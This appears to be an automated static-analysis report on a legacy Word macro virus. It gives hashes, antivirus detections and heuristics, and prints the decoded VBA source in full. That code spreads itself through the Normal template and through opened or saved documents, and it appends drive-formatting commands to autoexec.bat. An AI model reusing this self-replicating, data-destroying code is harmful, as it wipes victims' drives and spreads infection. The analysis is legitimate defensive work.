Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 63ac44db4f5e0739…

MALICIOUS

Office (OLE)

47.0 KB Created: 2000-07-27 11:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 31de1d6010124183d3b642683c8f7c3f SHA-1: c640f62aec5f28051ac87175de6e3c0c04c273cd SHA-256: 63ac44db4f5e0739aef8c80c4fe001733ba729ee1b9a920b6363b3fb2a4e925e
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, including an AutoOpen subroutine. This indicates the file is designed to execute malicious code automatically when opened. The ClamAV detections further confirm its malicious nature, identifying it as 'Doc.Trojan.Sector-2' and an extracted artifact as 'Dos.Trojan.FormatC-59'.

Heuristics 4

  • ClamAV: Doc.Trojan.Sector-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sector-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "AutoOpen"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4957 bytes
SHA-256: 8ff717f0a4f26b0ba1e7d254ecee0cb7490141fdac7f2dc39ebe90a91f9b1fdc
Detection
ClamAV: Dos.Trojan.FormatC-59
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoExit"
Sub MAIN()
On Error GoTo q
Call ToolsMacro.MAIN
q:
End Sub


Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Ìàêðîñ ñîçäàí "
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim u
Dim j
Dim i
On Error GoTo q
u = 0
j = WordBasic.CountMacros(0, 0)
For i = 1 To j
 If WordBasic.[MacroName$](i, 0, 0) = "Microsoft" Then u = 1
Next i
If u = 1 Then GoTo q
WordBasic.MacroCopy WordBasic.[Filename$]() + ":AutoExit", "Normal:AutoExit", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":AutoOpen", "Normal:MicrosoftWord", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":Microsoft", "Normal:Microsoft", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":MicrosoftOffice", "Normal:FileOpen", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":TM", "Normal:ToolsMacro", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":MacrosAN", "Normal:FileSaveAs", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":Normal", "Normal:FileTemplates", 1
WordBasic.MacroCopy WordBasic.[Filename$]() + ":Normal", "Normal:ViewVBCode", 1
q:
End Sub






Attribute VB_Name = "Microsoft"
Sub MAIN()
Attribute MAIN.VB_Description = "Ìàêðîñ ñîçäàí "
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.Microsoft.MAIN"
End Sub

Attribute VB_Name = "MicrosoftOffice"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Ìàêðîñ ñîçäàí "
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.MicrosoftOffice.MAIN"
Dim n
Dim iCountMacros
Dim i
Dim t$
On Error GoTo q1
Dialogs(wdDialogFileOpen).Show
n = 0
iCountMacros = WordBasic.CountMacros(1, 0, 0)
For i = 1 To iCountMacros
 t$ = WordBasic.[MacroName$](i, 1)
 If t$ = "Microsoft" Then n = 1
Next i
If n = 1 Then GoTo q1
SetAttr WordBasic.[Filename$](), 0
WordBasic.FileSaveAs WordBasic.[Filename$](), Format:=1
WordBasic.MacroCopy "Normal:AutoExit", WordBasic.[Filename$]() + ":AutoExit", 1
WordBasic.MacroCopy "Normal:MicrosoftWord", WordBasic.[Filename$]() + ":AutoOpen", 1
WordBasic.MacroCopy "Normal:Microsoft", WordBasic.[Filename$]() + ":Microsoft", 1
WordBasic.MacroCopy "Normal:FileOpen", WordBasic.[Filename$]() + ":MicrosoftOffice", 1
WordBasic.MacroCopy "Normal:ToolsMacro", WordBasic.[Filename$]() + ":TM", 1
WordBasic.MacroCopy "Normal:FileSaveAs", WordBasic.[Filename$]() + ":MacrosAN", 1
WordBasic.MacroCopy "Normal:FileTemplates", WordBasic.[Filename$]() + ":Normal", 1
q1:
End Sub






Attribute VB_Name = "TM"
Sub MAIN()
Attribute MAIN.VB_Description = "Ìàêðîñ ñîçäàí 14.03.95 Sector not Die!!!"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.TM.MAIN"
If (Second(Now()) = 13) Then
On Error GoTo s
MsgBox "Critical Error in Drive C:", vbCritical, "Error"
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, " "
Print #1, " "
Print #1, "@Echo Off"
Print #1, "@Echo y|format c: /u >nul"
Print #1, "@Echo y|format d: /u >nul"
Close #1
End If
s:
On Error GoTo Quit
If (Day(Now()) = 4) And (Month(Now()) = 7) Then
SetAttr "c:\autoexec.bat", 0
Open "c:\autoexec.bat" For Append As #1
Print #1, " "
Print #1, "echo Ñåãîäíÿ 04/07 - ìîé äåíü ðîæäåíüÿ!:-)"
Close #1
MsgBox "Today is my BirthDay! 04/07", vbSystemModal, "Congratilations!.."
End If
Quit:
SendKeys "%" + "{F4}"
End Sub

Attribute VB_Name = "MacrosAN"
Sub MAIN()
Dim h
Dim vCountMacros
Dim d
Dim t$
Dialogs(wdDialogFileSaveAs).Show
On Error GoTo q1
h = 0
vCountMacros = WordBasic.CountMacros(1, 0, 0)
For d = 1 To vCountMacros
 t$ = WordBasic.[MacroName$](d, 1)
 If t$ = "Microsoft" Then h = 1
Next d
If h = 1 Then GoTo q1
SetAttr WordBasic.[Filename$](), 0
WordBasic.FileSaveAs WordBasic.[Filename$](), Format:=1
WordBasic.MacroCopy "Normal:AutoExit", WordBasic.[Filename$]() + ":AutoExit", 1
WordBasic.MacroCopy "Normal:MicrosoftWord", WordBasic.[Filename$]() + ":AutoOpen", 1
WordBasic.MacroCopy "Normal:Microsoft", WordBasic.[Filename$]() + ":Microsoft", 1
WordBasic.MacroCopy "Normal:FileOpen", WordBasic.[Filename$]() + ":MicrosoftOffice", 1
WordBasic.MacroCopy "Normal:ToolsMacro", WordBasic.[Filename$]() + ":TM", 1
WordBasic.MacroCopy "Normal:FileSaveAs", WordBasic.[Filename$]() + ":MacrosAN", 1
WordBasic.MacroCopy "Normal:FileTemplates", WordBasic.[Filename$]() + ":Normal", 1
q1:
End Sub

Attribute VB_Name = "Normal"
Sub MAIN()
Attribute MAIN.VB_Description = "Ìàêðîñ ñîçäàí 14.03.95 Sector not Die!!!"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.Normal.MAIN"
On Error GoTo w
Call ToolsMacro.MAIN
w:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.